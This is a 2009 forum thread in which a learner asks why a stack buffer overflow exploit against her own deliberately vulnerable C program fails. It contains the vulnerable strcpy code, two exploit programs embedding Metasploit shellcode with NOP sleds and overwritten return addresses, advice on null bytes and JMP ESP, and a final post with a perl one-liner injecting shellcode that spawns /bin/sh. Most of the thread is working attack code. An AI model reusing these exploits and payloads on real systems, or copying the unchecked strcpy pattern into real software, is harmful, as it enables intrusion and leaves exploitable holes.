Government Security
Network Security Resources

Jump to content

Photo

Overwriting EIP question

- - - - - windows buffer overflow bug exploit virus c++ shell antivirus
  • Please log in to reply
4 replies to this topic

#1 cJenna86

cJenna86

    Private

  • Members
  • 2 posts

Posted 15 January 2009 - 02:24 PM

Hey guys, noob here. I've been trying to understand how a buffer overflow attack works, but so far no success when it comes to creating my own exploit. My problem is, I'm sure the shellcode works, I can overwrite the EIP and trick my vuln.exe to execute its own function (which should never be reached normally), but when I point that EIP to my shellcode, the address just changes...

Here's what I'm running/using:
- Windows XP SP3
- Data Execution Prevention is turned off
- Dev C++
- OllyDbg debugger
- shellcode from metasploit
- no antivirus

The vuln code looks like this (vuln.exe):

[codebox]
#include <stdlib.h>

int test()
{
printf("\nWhoa, you changed the EIP!");
}

int main(int argc, char *arg[])
{
char buffer[300];
int pass = 0;
if (argc == 1)
{
printf("At least give me something, will ya?\n");
}
else
{
strcpy(buffer, arg[1]);
}

if (pass == 1)
{ test(); }

system("PAUSE");

return 0;
}
[/codebox]

The exploit:

[codebox]
#include <stdlib.h>
#include <Windows.h>
#include <string.h>

int main()
{
//cmd: calc size=160
unsigned char shellcode[] = "\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x5e"
"\x2f\xcd\x3c\x83\xeb\xfc\xe2\xf4\xa2\xc7\x89\x3c\x5e\x2f\x46\x79"
"\x62\xa4\xb1\x39\x26\x2e\x22\xb7\x11\x37\x46\x63\x7e\x2e\x26\x75"
"\xd5\x1b\x46\x3d\xb0\x1e\x0d\xa5\xf2\xab\x0d\x48\x59\xee\x07\x31"
"\x5f\xed\x26\xc8\x65\x7b\xe9\x38\x2b\xca\x46\x63\x7a\x2e\x26\x5a"
"\xd5\x23\x86\xb7\x01\x33\xcc\xd7\xd5\x33\x46\x3d\xb5\xa6\x91\x18"
"\x5a\xec\xfc\xfc\x3a\xa4\x8d\x0c\xdb\xef\xb5\x30\xd5\x6f\xc1\xb7"
"\x2e\x33\x60\xb7\x36\x27\x26\x35\xd5\xaf\x7d\x3c\x5e\x2f\x46\x54"
"\x62\x70\xfc\xca\x3e\x79\x44\xc4\xdd\xef\xb6\x6c\x36\xdf\x47\x38"
"\x01\x47\x55\xc2\xd4\x21\x9a\xc3\xb9\x4c\xac\x50\x3d\x2f\xcd\x3c";


char nop[] = "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";

// Choose an EIP and test it out yourself
//char eip[] = "\x38\xfd\x22\x00"; // shellcode address
//char eip[] = "\x10\xFD\x22\x00"; // some address within the NOP block
//char eip[] = "\x68\x13\x40\x00"; // function test()

char buffer[strlen(shellcode) + strlen(nop) + strlen(eip)];
strcat(buffer, nop);
strcat(buffer, shellcode);
strcat(buffer, eip);


ShellExecute(0, "open", "C:\\vuln.exe", buffer, 0, SW_SHOW);
printf("\n");
system("pause");
return 0;
}
[/codebox]

The address for test() - \x68\x13\x40\x00 - works. But attempting \x10\xFD\x22\x00 the debugger gives me something like this: 0000FD10 - as you can see, \x22 becomes \x00...? How can I get my exploit to work?

Computer guru please educate me....

-Jenna

#2 KOrUPt

KOrUPt

    Private First Class

  • Sergeant Major
  • 64 posts

Posted 16 January 2009 - 04:15 AM

I haven't tested this but it may help :).
#include <windows.h>
 #include <stdlib.h>
 #include <stdio.h>
 #include <string.h>
 #define sledsize 155
 #define shellsize 160
 
 //cmd: calc size = 160
 unsigned char shellcode[] = 
 "\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x5e"
 "\x2f\xcd\x3c\x83\xeb\xfc\xe2\xf4\xa2\xc7\x89\x3c\x5e\x2f\x46\x79"
 "\x62\xa4\xb1\x39\x26\x2e\x22\xb7\x11\x37\x46\x63\x7e\x2e\x26\x75"
 "\xd5\x1b\x46\x3d\xb0\x1e\x0d\xa5\xf2\xab\x0d\x48\x59\xee\x07\x31"
 "\x5f\xed\x26\xc8\x65\x7b\xe9\x38\x2b\xca\x46\x63\x7a\x2e\x26\x5a"
 "\xd5\x23\x86\xb7\x01\x33\xcc\xd7\xd5\x33\x46\x3d\xb5\xa6\x91\x18"
 "\x5a\xec\xfc\xfc\x3a\xa4\x8d\x0c\xdb\xef\xb5\x30\xd5\x6f\xc1\xb7"
 "\x2e\x33\x60\xb7\x36\x27\x26\x35\xd5\xaf\x7d\x3c\x5e\x2f\x46\x54"
 "\x62\x70\xfc\xca\x3e\x79\x44\xc4\xdd\xef\xb6\x6c\x36\xdf\x47\x38"
 "\x01\x47\x55\xc2\xd4\x21\x9a\xc3\xb9\x4c\xac\x50\x3d\x2f\xcd\x3c";
 
 
 int main(void)
 {
	 unsigned char eip[5] = "\xEF\xBE\xAD\xDE"; // address of test function
	 unsigned char *buffer = (unsigned char *)malloc(shellsize + sledsize + 8);
	 if(buffer){
		 memset(buffer, 0x90, shellsize  + sledsize + 8);
		 memcpy(buffer + sledsize, shellcode, shellsize);
		 memcpy(buffer + sledsize + shellsize , eip, 4);
		 buffer[sledsize + shellsize  + 5] = 0;
		 ShellExecute(0, "open", "C:\\vuln.exe", (char *)buffer, 0, SW_SHOW);
		 free(buffer);
		 printf("Done");
	 }else printf("Out of memory");
	 
	 return 0;
 }
I'm surprised your above code even compiled given how you where working out the size of a stack based variable.

Hopefully the above code helps.

KOrUPt.
Coder and Reverse Engineer. My blog.

#3 cJenna86

cJenna86

    Private

  • Members
  • 2 posts

Posted 16 January 2009 - 05:37 PM

hey korupt, thanks for the reply and the code. But the exploit results pretty much stay the same, and I'm still stuck...

At first I compiled your code, but I only got an error saying "offset: 0090dead". So I adjusted sledsize to 157, changed the EIP to the one I have, and then the code achieved the exact same result just like mine - test() function executed. At least this part is good to know...

But then again, by using your code, except with a different EIP this time pointing to my shellcode (0022ff08 in my case), I got an error "offset: Offset: 0000ff08" This is exactly what happened to my exploit, the \x22 got replaced......... why is that?

-Jenna

#4 webdevil

webdevil

    Retired GSO General

  • Sergeant Major
  • 1,195 posts

Posted 17 January 2009 - 05:14 AM

It may be because of the Null character 0x00 in the EIP, try putting the shellcode in a environment variable then try exploiting. ( Hopefully this wont have a null char)
You generally look for a JMP ESP etc if you face such kind of a problem.

#5 s3xymoon

s3xymoon

    Private First Class

  • Members
  • 57 posts

Posted 14 June 2009 - 12:18 PM

i have overwrited that eip but it is somewhere in the middle of the buffer
$ export TEST=`perl -e 'print "xxxxxxxxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80\x30\xec\xbf\xbfAAAAAxxxxxxxxxxxxxxxxxxxxxxAAAAAAAAAxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"'`
$ ./lame $TEST																														  $ exit

i can spawn a shell but cant printf("whoa you have overwrited the eip"); ... :)





Also tagged with one or more of these keywords: windows, buffer overflow, bug, exploit, virus, c++, shell, antivirus